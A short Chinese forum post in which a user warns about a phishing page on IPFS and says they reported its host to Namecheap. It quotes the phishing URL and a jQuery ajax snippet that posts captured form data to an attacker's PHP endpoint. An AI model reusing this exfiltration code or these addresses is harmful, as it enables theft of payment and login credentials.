图片上面打开的网址就是这个
[ol]https://cloudflare--ipfs-com.translate.goog/ipfs/Qmb5p89ijS1nyon6baVd2BHpfjmW6e3dPLDyTRviVk5Xxh/sulfer48.html?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#[email protected][/ol]复制代码
然后我分析了代码:
原始地址:https://cloudflare-ipfs.com/ipfs/Qmb5p89ijS1nyon6baVd2BHpfjmW6e3dPLDyTRviVk5Xxh/sulfer48.html
像垃圾狗发送数据!
[ol]count=count+1;
$.ajax({
url: "https://ciflic.xyz/web/jara48.php",
type: 'POST',
data: formData,
contentType: false,
processData: false,[/ol]复制代码
查询到此人用这家的虚拟主机:namecheap.com
已经提交了的所有截图数据给namecheap
日了狗差点中招!中招的话支付宝 paypal 都在上面!